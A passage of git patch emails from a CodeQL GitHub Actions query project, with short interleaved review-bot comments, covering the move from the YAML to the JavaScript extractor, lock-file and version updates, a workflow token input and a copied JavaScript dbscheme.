-yaml_anchors (unique int node: @yaml_node ref,
- string anchor: string ref);
-
-yaml_aliases (unique int alias: @yaml_alias_node ref,
- string target: string ref);
-
-yaml_scalars (unique int scalar: @yaml_scalar_node ref,
- int style: int ref,
- string value: string ref);
-
-yaml_errors (unique int id: @yaml_error,
- string message: string ref);
-
-yaml_locations(unique int locatable: @yaml_locatable ref,
- int location: @location_default ref);
-
-@yaml_locatable = @yaml_node | @yaml_error;
-
-/*- Files and folders -*/
-
-/**
- * The location of an element.
- * The location spans column `startcolumn` of line `startline` to
- * column `endcolumn` of line `endline` in file `file`.
- * For more information, see
- * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/).
- */
-locations_default(
- unique int id: @location_default,
- int file: @file ref,
- int beginLine: int ref,
- int beginColumn: int ref,
- int endLine: int ref,
- int endColumn: int ref
-);
-
-files(
- unique int id: @file,
- string name: string ref
-);
-
-folders(
- unique int id: @folder,
- string name: string ref
-);
-
-@container = @file | @folder
-
-containerparent(
- int parent: @container ref,
- unique int child: @container ref
-);
-
-/*- Source location prefix -*/
-
-/**
- * The source location of the snapshot.
- */
-sourceLocationPrefix(string prefix : string ref);
diff --git a/ql/lib/yaml.dbscheme.stats b/ql/lib/yaml.dbscheme.stats
deleted file mode 100644
index 1c35ae984020..000000000000
--- a/ql/lib/yaml.dbscheme.stats
+++ /dev/null
@@ -1,4 +0,0 @@
-
-
-
-
\ No newline at end of file
diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml
index 4b8239b7f6ca..8110845ea1f9 100644
--- a/ql/src/codeql-pack.lock.yml
+++ b/ql/src/codeql-pack.lock.yml
@@ -7,6 +7,12 @@ dependencies:
 version: 1.0.0
 codeql/ssa:
 version: 1.0.0
+ codeql/javascript-all:
+ version: 1.0.0
+ codeql/regex:
+ version: 1.0.0
+ codeql/tutorial:
+ version: 1.0.0
 codeql/typetracking:
 version: 1.0.0
 codeql/util:
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 65bb672183fe..669a8f88186e 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -6,8 +6,9 @@ groups:
 - actions
 - queries
 suites: codeql-suites
-extractor: yaml
+extractor: javascript
 defaultSuiteFile: codeql-suites/actions-code-scanning.qls
 dependencies:
+ codeql/javascript-all: ^1.0.0
 githubsecuritylab/actions-all: ${workspace}
 warnOnImplicitThis: true
diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml
index 4b8239b7f6ca..8110845ea1f9 100644
--- a/ql/test/codeql-pack.lock.yml
+++ b/ql/test/codeql-pack.lock.yml
@@ -7,6 +7,12 @@ dependencies:
 version: 1.0.0
 codeql/ssa:
 version: 1.0.0
+ codeql/javascript-all:
+ version: 1.0.0
+ codeql/regex:
+ version: 1.0.0
+ codeql/tutorial:
+ version: 1.0.0
 codeql/typetracking:
 version: 1.0.0
 codeql/util:
diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql
index e3304b4fe72b..80ebd80b4c2b 100644
--- a/ql/test/library-tests/test.ql
+++ b/ql/test/library-tests/test.ql
@@ -50,13 +50,13 @@ query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() =
 query predicate scopes(Cfg::CfgScope c) { any() }
 query predicate sources(string action, string version, string output, string kind, string provenance) {
- sourceModel(action, version, output, kind, provenance)
+ actionsSourceModel(action, version, output, kind, provenance)
 }
 query predicate summaries(
 string action, string version, string input, string output, string kind, string provenance
 ) {
- summaryModel(action, version, input, output, kind, provenance)
+ actionsSummaryModel(action, version, input, output, kind, provenance)
 }
 query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() }
diff --git a/ql/test/qlpack.yml b/ql/test/qlpack.yml
index d85fc698394d..1676d742d37e 100644
--- a/ql/test/qlpack.yml
+++ b/ql/test/qlpack.yml
@@ -1,12 +1,10 @@
 ---
 name: githubsecuritylab/actions-tests
-groups:
- - actions
- - test
+groups: [javascript, test]
 dependencies:
 githubsecuritylab/actions-all: ${workspace}
 githubsecuritylab/actions-queries: ${workspace}
-extractor: yaml
+extractor: javascript
 tests: .
 warnOnImplicitThis: true
From df3d6131a8f754cec6514f5d715b75a33158efbd Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 12 Jun 2024 08:50:49 +0200
Subject: [PATCH 328/707] Update lock files
---
 ql/lib/codeql-pack.lock.yml | 2 ++
 ql/src/codeql-pack.lock.yml | 8 ++++++--
 ql/src/qlpack.yml | 4 +---
 ql/test/codeql-pack.lock.yml | 8 ++++++--
 4 files changed, 15 insertions(+), 7 deletions(-)
diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml
index c50889c18858..82795df00063 100644
--- a/ql/lib/codeql-pack.lock.yml
+++ b/ql/lib/codeql-pack.lock.yml
@@ -1,6 +1,8 @@
 ---
 lockVersion: 1.0.0
 dependencies:
+ codeql/controlflow:
+ version: 1.0.0
 codeql/dataflow:
 version: 1.0.0
 codeql/javascript-all:
diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml
index 8110845ea1f9..82795df00063 100644
--- a/ql/src/codeql-pack.lock.yml
+++ b/ql/src/codeql-pack.lock.yml
@@ -5,18 +5,22 @@ dependencies:
 version: 1.0.0
 codeql/dataflow:
 version: 1.0.0
- codeql/ssa:
- version: 1.0.0
 codeql/javascript-all:
 version: 1.0.0
+ codeql/mad:
+ version: 1.0.0
 codeql/regex:
 version: 1.0.0
+ codeql/ssa:
+ version: 1.0.0
 codeql/tutorial:
 version: 1.0.0
 codeql/typetracking:
 version: 1.0.0
 codeql/util:
 version: 1.0.0
+ codeql/xml:
+ version: 1.0.0
 codeql/yaml:
 version: 1.0.0
 compiled: false
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 669a8f88186e..17e451718c5b 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -2,9 +2,7 @@
 library: false
 name: githubsecuritylab/actions-queries
 version: 0.0.36
-groups:
- - actions
- - queries
+groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
 defaultSuiteFile: codeql-suites/actions-code-scanning.qls
diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml
index 8110845ea1f9..82795df00063 100644
--- a/ql/test/codeql-pack.lock.yml
+++ b/ql/test/codeql-pack.lock.yml
@@ -5,18 +5,22 @@ dependencies:
 version: 1.0.0
 codeql/dataflow:
 version: 1.0.0
- codeql/ssa:
- version: 1.0.0
 codeql/javascript-all:
 version: 1.0.0
+ codeql/mad:
+ version: 1.0.0
 codeql/regex:
 version: 1.0.0
+ codeql/ssa:
+ version: 1.0.0
 codeql/tutorial:
 version: 1.0.0
 codeql/typetracking:
 version: 1.0.0
 codeql/util:
 version: 1.0.0
+ codeql/xml:
+ version: 1.0.0
 codeql/yaml:
 version: 1.0.0
 compiled: false
From e2fb677abb6df7e47cb3f0e2d7f56ea5fabd950f Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 12 Jun 2024 09:48:27 +0200
Subject: [PATCH 329/707] Remove DS_Store
---
 .!79690!.DS_Store | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 delete mode 100644 .!79690!.DS_Store
diff --git a/.!79690!.DS_Store b/.!79690!.DS_Store
deleted file mode 100644
index e69de29bb2d1..000000000000
From e5eb85695dadf607ec0f31deeb7a93bc556912ae Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 12 Jun 2024 10:04:50 +0200
Subject: [PATCH 330/707] Update action to use javascript extractor
---
 .github/action/dist/index.js | 10 +++++-----
 .github/action/src/codeql.ts | 2 +-
 .github/action/src/index.ts | 8 ++++----
 3 files changed, 10 insertions(+), 10 deletions(-)
diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js
index 8ff1e7759d27..7bb3039fe486 100644
--- a/.github/action/dist/index.js
+++ b/.github/action/dist/index.js
@@ -28604,7 +28604,7 @@ const toolcache = __importStar(__nccwpck_require__(7784));
 const toolrunner = __importStar(__nccwpck_require__(8159));
 async function newCodeQL() {
 return {
- language: "yaml",
+ language: "javascript",
 path: await findCodeQL(),
 pack: "githubsecuritylab/actions-queries",
 suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`,
@@ -28771,16 +28771,16 @@ async function run() {
 var codeql = await cql.newCodeQL();
 core.debug(`CodeQL CLI found at '${codeql.path}'`);
 await cql.runCommand(codeql, ["version", "--format", "terse"]);
- // check yaml support
+ // check javascript support
 var languages = await cql.runCommandJson(codeql, [
 "resolve",
 "languages",
 "--format",
 "json",
 ]);
- if (!languages.hasOwnProperty("yaml")) {
- core.setFailed("CodeQL Yaml extractor not installed");
- throw new Error("CodeQL Yaml extractor not installed");
+ if (!languages.hasOwnProperty("javascript")) {
+ core.setFailed("CodeQL javascript extractor not installed");
+ throw new Error("CodeQL javascript extractor not installed");
 }
 // download pack
 core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`);
diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts
index 76eacd6eb67e..08c4b420a4ca 100644
--- a/.github/action/src/codeql.ts
+++ b/.github/action/src/codeql.ts
@@ -24,7 +24,7 @@ export interface CodeQLConfig {
 export async function newCodeQL(): Promise {
 return {
- language: "yaml",
+ language: "javascript",
 path: await findCodeQL(),
 pack: "githubsecuritylab/actions-queries",
 suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`,
diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts
index b1a4fc80c644..53a484ae6c18 100644
--- a/.github/action/src/index.ts
+++ b/.github/action/src/index.ts
@@ -15,7 +15,7 @@ export async function run(): Promise {
 await cql.runCommand(codeql, ["version", "--format", "terse"]);
- // check yaml support
+ // check javascript support
 var languages = await cql.runCommandJson(codeql, [
 "resolve",
 "languages",
@@ -23,9 +23,9 @@ export async function run(): Promise {
 "json",
 ]);
- if (!languages.hasOwnProperty("yaml")) {
- core.setFailed("CodeQL Yaml extractor not installed");
- throw new Error("CodeQL Yaml extractor not installed");
+ if (!languages.hasOwnProperty("javascript")) {
+ core.setFailed("CodeQL javascript extractor not installed");
+ throw new Error("CodeQL javascript extractor not installed");
 }
 // download pack
From f068504c4f50710ae88d4bfed562b728538ac2f4 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Wed, 12 Jun 2024 10:07:36 +0200
Subject: [PATCH 331/707] Bump qlpack versions
---
 ql/lib/qlpack.yml | 2 +-
 ql/src/qlpack.yml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 89f8511812b4..51347aa2c3b9 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: githubsecuritylab/actions-all
-version: 0.0.36
+version: 0.1.0
 dependencies:
 codeql/javascript-all: ^1.0.0
 codeql/util: ^1.0.0
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 17e451718c5b..e8c5259e9b8c 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
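Review bot: In the `src/index.ts` hunk the rewritten guard `if (!languages.hasOwnProperty("javascript"))` calls `hasOwnProperty` on an object parsed from C LI JSON output, which the usual `no-prototype-builtins` lint rejects, and the result of `runCommandJson` is still bound with `var`; `const languages = ...` and `if (!Object.prototype.hasOwnProperty.call(languages, "javascript"))` (or `!("javascript" in languages)`) is the conventional form. The branch also calls `core.setFailed(...)` and then throws an `Error` carrying the identical message, so the failure will presumably be reported twice if the caller of `run()` also routes rejections to `setFailed`; one of the two suffices. `run()` starts and ends outside this hunk.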
@@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.36 +version: 0.1.0 groups: [actions, queries] suites: codeql-suites extractor: javascript From f8dd493a684f58f816d883276132547409ae068c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 12 Jun 2024 11:15:17 +0200 Subject: [PATCH 332/707] Update build.yml --- .github/workflows/build.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index 78fec3b00eb5..8ba664564b40 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -25,4 +25,6 @@ jobs: - name: Run action if: steps.changes.outputs.src == 'true' + env: + GITHUB_TOKEN: ${{ secrets.GHCR_TOKEN }} uses: ./ From c61e71f22d3faeb4ad118688a553bbf4104b2264 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 12 Jun 2024 11:19:06 +0200 Subject: [PATCH 333/707] Update build.yml --- .github/workflows/build.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index 8ba664564b40..9bc5b787feac 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -25,6 +25,6 @@ jobs: - name: Run action if: steps.changes.outputs.src == 'true' - env: - GITHUB_TOKEN: ${{ secrets.GHCR_TOKEN }} uses: ./ + with: + token: ${{ secrets.GHCR_TOKEN }} From fbaf329428eb998999d8aaa6935852490df15982 Mon Sep 17 00:00:00 2001 
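Review bot: In the PATCH 333 build.yml hunk, `secrets.GHCR_TOKEN` is handed to the local action as the `token` input with no record of what the token is used for or which scopes it needs; judging by the pack download in the PATCH 330 index.ts hunk, a read-only package scope is presumably sufficient, but nothing in the workflow states that. A one-line comment above the step, `# GHCR_TOKEN: read-only token used only to download the CodeQL Actions pack`, would document the least-privilege expectation for whoever rotates the secret. If the pack lives in the same organisation as this repository, the job-scoped `${{ github.token }}` together with `permissions: packages: read` may make the long-lived secret unnecessary, which is worth confirming. The `jobs:` block this step belongs to starts outside the hunk.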
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 13 Jun 2024 11:50:28 +0200 Subject: [PATCH 334/707] Remove dependencies with javascript-all --- ql/lib/codeql-pack.lock.yml | 10 - ql/lib/qlpack.yml | 1 - ql/src/codeql-pack.lock.yml | 10 - ql/src/qlpack.yml | 2 +- ql/src/semmlecode.javascript.dbscheme | 1190 + ql/src/semmlecode.javascript.dbscheme.stats | 28248 ++++++++++++++++++ ql/test/codeql-pack.lock.yml | 10 - 7 files changed, 29439 insertions(+), 32 deletions(-) create mode 100644 ql/src/semmlecode.javascript.dbscheme create mode 100644 ql/src/semmlecode.javascript.dbscheme.stats diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 82795df00063..4b8239b7f6ca 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -5,22 +5,12 @@ dependencies: version: 1.0.0 codeql/dataflow: version: 1.0.0 - codeql/javascript-all: - version: 1.0.0 - codeql/mad: - version: 1.0.0 - codeql/regex: - version: 1.0.0 codeql/ssa: version: 1.0.0 - codeql/tutorial: - version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: version: 1.0.0 - codeql/xml: - version: 1.0.0 codeql/yaml: version: 1.0.0 compiled: false diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 51347aa2c3b9..6a247cee330f 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,7 +4,6 @@ warnOnImplicitThis: true name: githubsecuritylab/actions-all version: 0.1.0 dependencies: - codeql/javascript-all: ^1.0.0 codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 codeql/controlflow: ^1.0.0 diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 82795df00063..4b8239b7f6ca 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml 
@@ -5,22 +5,12 @@ dependencies: version: 1.0.0 codeql/dataflow: version: 1.0.0 - codeql/javascript-all: - version: 1.0.0 - codeql/mad: - version: 1.0.0 - codeql/regex: - version: 1.0.0 codeql/ssa: version: 1.0.0 - codeql/tutorial: - version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: version: 1.0.0 - codeql/xml: - version: 1.0.0 codeql/yaml: version: 1.0.0 compiled: false diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e8c5259e9b8c..05f3408c578d 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -5,8 +5,8 @@ version: 0.1.0 groups: [actions, queries] suites: codeql-suites extractor: javascript +dbscheme: semmlecode.javascript.dbscheme defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: - codeql/javascript-all: ^1.0.0 githubsecuritylab/actions-all: ${workspace} warnOnImplicitThis: true diff --git a/ql/src/semmlecode.javascript.dbscheme b/ql/src/semmlecode.javascript.dbscheme new file mode 100644 index 000000000000..c88c69174bd0 --- /dev/null +++ b/ql/src/semmlecode.javascript.dbscheme 
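Review bot: The new `dbscheme: semmlecode.javascript.dbscheme` line in the ql/src/qlpack.yml hunk points at a file copied into ql/src from the upstream CodeQL JavaScript extractor, yet nothing records which CodeQL release it was taken from, and the `codeql/javascript-all` dependency that previously supplied it is removed in the same commit. A dbscheme that drifts from the installed extractor fails at database creation, so a comment beside the line, e.g. `# copied from codeql/javascript <UPSTREAM_CODEQL_VERSION> — keep in sync with the CLI the action resolves`, and a note that the accompanying `.dbscheme.stats` file must be regenerated whenever the scheme is replaced would make the coupling explicit. Whether the action's `findCodeQL()` pins a CLI version matching this scheme is not visible here.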
@@ -0,0 +1,1190 @@ +/*** Standard fragments ***/ + +/*- Files and folders -*/ + +/** + * The location of an element. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `file`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +/*- Lines of code -*/ + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref +); + +/*- External data -*/ + +/** + * External data, loaded from CSV files during snapshot creation. See + * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data) + * for more information. + */ +externalData( + int id : @externalDataElement, + string path : string ref, + int column: int ref, + string value : string ref +); + +/*- Source location prefix -*/ + +/** + * The source location of the snapshot. 
+ */ +sourceLocationPrefix(string prefix : string ref); + +/*- JavaScript-specific part -*/ + +@location = @location_default + +@sourceline = @locatable; + +filetype( + int file: @file ref, + string filetype: string ref +) + +// top-level code fragments +toplevels (unique int id: @toplevel, + int kind: int ref); + +is_externs (int toplevel: @toplevel ref); + +case @toplevel.kind of + 0 = @script +| 1 = @inline_script +| 2 = @event_handler +| 3 = @javascript_url +| 4 = @template_toplevel; + +is_module (int tl: @toplevel ref); +is_nodejs (int tl: @toplevel ref); +is_es2015_module (int tl: @toplevel ref); +is_closure_module (int tl: @toplevel ref); + +@xml_node_with_code = @xmlelement | @xmlattribute | @template_placeholder_tag; +toplevel_parent_xml_node( + unique int toplevel: @toplevel ref, + int xmlnode: @xml_node_with_code ref); + +xml_element_parent_expression( + unique int xmlnode: @xmlelement ref, + int expression: @expr ref, + int index: int ref); + +// statements +#keyset[parent, idx] +stmts (unique int id: @stmt, + int kind: int ref, + int parent: @stmt_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +stmt_containers (unique int stmt: @stmt ref, + int container: @stmt_container ref); + +jump_targets (unique int jump: @stmt ref, + int target: @stmt ref); + +@stmt_parent = @stmt | @toplevel | @function_expr | @arrow_function_expr | @static_initializer; +@stmt_container = @toplevel | @function | @namespace_declaration | @external_module_declaration | @global_augmentation_declaration; + +case @stmt.kind of + 0 = @empty_stmt +| 1 = @block_stmt +| 2 = @expr_stmt +| 3 = @if_stmt +| 4 = @labeled_stmt +| 5 = @break_stmt +| 6 = @continue_stmt +| 7 = @with_stmt +| 8 = @switch_stmt +| 9 = @return_stmt +| 10 = @throw_stmt +| 11 = @try_stmt +| 12 = @while_stmt +| 13 = @do_while_stmt +| 14 = @for_stmt +| 15 = @for_in_stmt +| 16 = @debugger_stmt +| 17 = @function_decl_stmt +| 18 = @var_decl_stmt +| 19 = @case +| 20 = @catch_clause +| 21 = 
@for_of_stmt +| 22 = @const_decl_stmt +| 23 = @let_stmt +| 24 = @legacy_let_stmt +| 25 = @for_each_stmt +| 26 = @class_decl_stmt +| 27 = @import_declaration +| 28 = @export_all_declaration +| 29 = @export_default_declaration +| 30 = @export_named_declaration +| 31 = @namespace_declaration +| 32 = @import_equals_declaration +| 33 = @export_assign_declaration +| 34 = @interface_declaration +| 35 = @type_alias_declaration +| 36 = @enum_declaration +| 37 = @external_module_declaration +| 38 = @export_as_namespace_declaration +| 39 = @global_augmentation_declaration +| 40 = @using_decl_stmt +; + +@decl_stmt = @var_decl_stmt | @const_decl_stmt | @let_stmt | @legacy_let_stmt | @using_decl_stmt; + +@export_declaration = @export_all_declaration | @export_default_declaration | @export_named_declaration; + +@namespace_definition = @namespace_declaration | @enum_declaration; +@type_definition = @class_definition | @interface_declaration | @enum_declaration | @type_alias_declaration | @enum_member; + +is_instantiated(unique int decl: @namespace_declaration ref); + +@declarable_node = @decl_stmt | @namespace_declaration | @class_decl_stmt | @function_decl_stmt | @enum_declaration | @external_module_declaration | @global_augmentation_declaration | @field; +has_declare_keyword(unique int stmt: @declarable_node ref); + +is_for_await_of(unique int forof: @for_of_stmt ref); + +// expressions +#keyset[parent, idx] +exprs (unique int id: @expr, + int kind: int ref, + int parent: @expr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +literals (varchar(900) value: string ref, + varchar(900) raw: string ref, + unique int expr: @expr_or_type ref); + +enclosing_stmt (unique int expr: @expr_or_type ref, + int stmt: @stmt ref); + +expr_containers (unique int expr: @expr_or_type ref, + int container: @stmt_container ref); + +array_size (unique int ae: @arraylike ref, + int sz: int ref); + +is_delegating (int yield: @yield_expr ref); + +@expr_or_stmt = @expr | @stmt; 
+@expr_or_type = @expr | @typeexpr; +@expr_parent = @expr_or_stmt | @property | @function_typeexpr; +@arraylike = @array_expr | @array_pattern; +@type_annotation = @typeexpr | @jsdoc_type_expr; +@node_in_stmt_container = @cfg_node | @type_annotation | @toplevel; + +case @expr.kind of + 0 = @label +| 1 = @null_literal +| 2 = @boolean_literal +| 3 = @number_literal +| 4 = @string_literal +| 5 = @regexp_literal +| 6 = @this_expr +| 7 = @array_expr +| 8 = @obj_expr +| 9 = @function_expr +| 10 = @seq_expr +| 11 = @conditional_expr +| 12 = @new_expr +| 13 = @call_expr +| 14 = @dot_expr +| 15 = @index_expr +| 16 = @neg_expr +| 17 = @plus_expr +| 18 = @log_not_expr +| 19 = @bit_not_expr +| 20 = @typeof_expr +| 21 = @void_expr +| 22 = @delete_expr +| 23 = @eq_expr +| 24 = @neq_expr +| 25 = @eqq_expr +| 26 = @neqq_expr +| 27 = @lt_expr +| 28 = @le_expr +| 29 = @gt_expr +| 30 = @ge_expr +| 31 = @lshift_expr +| 32 = @rshift_expr +| 33 = @urshift_expr +| 34 = @add_expr +| 35 = @sub_expr +| 36 = @mul_expr +| 37 = @div_expr +| 38 = @mod_expr +| 39 = @bitor_expr +| 40 = @xor_expr +| 41 = @bitand_expr +| 42 = @in_expr +| 43 = @instanceof_expr +| 44 = @logand_expr +| 45 = @logor_expr +| 47 = @assign_expr +| 48 = @assign_add_expr +| 49 = @assign_sub_expr +| 50 = @assign_mul_expr +| 51 = @assign_div_expr +| 52 = @assign_mod_expr +| 53 = @assign_lshift_expr +| 54 = @assign_rshift_expr +| 55 = @assign_urshift_expr +| 56 = @assign_or_expr +| 57 = @assign_xor_expr +| 58 = @assign_and_expr +| 59 = @preinc_expr +| 60 = @postinc_expr +| 61 = @predec_expr +| 62 = @postdec_expr +| 63 = @par_expr +| 64 = @var_declarator +| 65 = @arrow_function_expr +| 66 = @spread_element +| 67 = @array_pattern +| 68 = @object_pattern +| 69 = @yield_expr +| 70 = @tagged_template_expr +| 71 = @template_literal +| 72 = @template_element +| 73 = @array_comprehension_expr +| 74 = @generator_expr +| 75 = @for_in_comprehension_block +| 76 = @for_of_comprehension_block +| 77 = @legacy_letexpr +| 78 = @var_decl +| 79 = 
@proper_varaccess +| 80 = @class_expr +| 81 = @super_expr +| 82 = @newtarget_expr +| 83 = @named_import_specifier +| 84 = @import_default_specifier +| 85 = @import_namespace_specifier +| 86 = @named_export_specifier +| 87 = @exp_expr +| 88 = @assign_exp_expr +| 89 = @jsx_element +| 90 = @jsx_qualified_name +| 91 = @jsx_empty_expr +| 92 = @await_expr +| 93 = @function_sent_expr +| 94 = @decorator +| 95 = @export_default_specifier +| 96 = @export_namespace_specifier +| 97 = @bind_expr +| 98 = @external_module_reference +| 99 = @dynamic_import +| 100 = @expression_with_type_arguments +| 101 = @prefix_type_assertion +| 102 = @as_type_assertion +| 103 = @export_varaccess +| 104 = @decorator_list +| 105 = @non_null_assertion +| 106 = @bigint_literal +| 107 = @nullishcoalescing_expr +| 108 = @e4x_xml_anyname +| 109 = @e4x_xml_static_attribute_selector +| 110 = @e4x_xml_dynamic_attribute_selector +| 111 = @e4x_xml_filter_expression +| 112 = @e4x_xml_static_qualident +| 113 = @e4x_xml_dynamic_qualident +| 114 = @e4x_xml_dotdotexpr +| 115 = @import_meta_expr +| 116 = @assignlogandexpr +| 117 = @assignlogorexpr +| 118 = @assignnullishcoalescingexpr +| 119 = @template_pipe_ref +| 120 = @generated_code_expr +| 121 = @satisfies_expr +; + +@varaccess = @proper_varaccess | @export_varaccess; +@varref = @var_decl | @varaccess; + +@identifier = @label | @varref | @type_identifier; + +@literal = @null_literal | @boolean_literal | @number_literal | @string_literal | @regexp_literal | @bigint_literal; + +@propaccess = @dot_expr | @index_expr; + +@invokeexpr = @new_expr | @call_expr; + +@unaryexpr = @neg_expr | @plus_expr | @log_not_expr | @bit_not_expr | @typeof_expr | @void_expr | @delete_expr | @spread_element; + +@equality_test = @eq_expr | @neq_expr | @eqq_expr | @neqq_expr; + +@comparison = @equality_test | @lt_expr | @le_expr | @gt_expr | @ge_expr; + +@binaryexpr = @comparison | @lshift_expr | @rshift_expr | @urshift_expr | @add_expr | @sub_expr | @mul_expr | @div_expr | 
@mod_expr | @exp_expr | @bitor_expr | @xor_expr | @bitand_expr | @in_expr | @instanceof_expr | @logand_expr | @logor_expr | @nullishcoalescing_expr; + +@assignment = @assign_expr | @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr | @assign_mod_expr | @assign_exp_expr | @assign_lshift_expr | @assign_rshift_expr | @assign_urshift_expr | @assign_or_expr | @assign_xor_expr | @assign_and_expr | @assignlogandexpr | @assignlogorexpr | @assignnullishcoalescingexpr; + +@updateexpr = @preinc_expr | @postinc_expr | @predec_expr | @postdec_expr; + +@pattern = @varref | @array_pattern | @object_pattern; + +@comprehension_expr = @array_comprehension_expr | @generator_expr; + +@comprehension_block = @for_in_comprehension_block | @for_of_comprehension_block; + +@import_specifier = @named_import_specifier | @import_default_specifier | @import_namespace_specifier; + +@exportspecifier = @named_export_specifier | @export_default_specifier | @export_namespace_specifier; + +@type_keyword_operand = @import_declaration | @export_declaration | @import_specifier; + +@type_assertion = @as_type_assertion | @prefix_type_assertion; + +@class_definition = @class_decl_stmt | @class_expr; +@interface_definition = @interface_declaration | @interface_typeexpr; +@class_or_interface = @class_definition | @interface_definition; + +@lexical_decl = @var_decl | @type_decl; +@lexical_access = @varaccess | @local_type_access | @local_var_type_access | @local_namespace_access; +@lexical_ref = @lexical_decl | @lexical_access; + +@e4x_xml_attribute_selector = @e4x_xml_static_attribute_selector | @e4x_xml_dynamic_attribute_selector; +@e4x_xml_qualident = @e4x_xml_static_qualident | @e4x_xml_dynamic_qualident; + +expr_contains_template_tag_location( + int expr: @expr ref, + int location: @location ref +); + +@template_placeholder_tag_parent = @xmlelement | @xmlattribute | @file; + +template_placeholder_tag_info( + unique int node: @template_placeholder_tag, + int parentNode: 
@template_placeholder_tag_parent ref, + varchar(900) raw: string ref +); + +// scopes +scopes (unique int id: @scope, + int kind: int ref); + +case @scope.kind of + 0 = @global_scope +| 1 = @function_scope +| 2 = @catch_scope +| 3 = @module_scope +| 4 = @block_scope +| 5 = @for_scope +| 6 = @for_in_scope // for-of scopes work the same as for-in scopes +| 7 = @comprehension_block_scope +| 8 = @class_expr_scope +| 9 = @namespace_scope +| 10 = @class_decl_scope +| 11 = @interface_scope +| 12 = @type_alias_scope +| 13 = @mapped_type_scope +| 14 = @enum_scope +| 15 = @external_module_scope +| 16 = @conditional_type_scope; + +scopenodes (unique int node: @ast_node ref, + int scope: @scope ref); + +scopenesting (unique int inner: @scope ref, + int outer: @scope ref); + +// functions +@function = @function_decl_stmt | @function_expr | @arrow_function_expr; + +@parameterized = @function | @catch_clause; +@type_parameterized = @function | @class_or_interface | @type_alias_declaration | @mapped_typeexpr | @infer_typeexpr; + +is_generator (int fun: @function ref); +has_rest_parameter (int fun: @function ref); +is_async (int fun: @function ref); + +// variables and lexically scoped type names +#keyset[scope, name] +variables (unique int id: @variable, + varchar(900) name: string ref, + int scope: 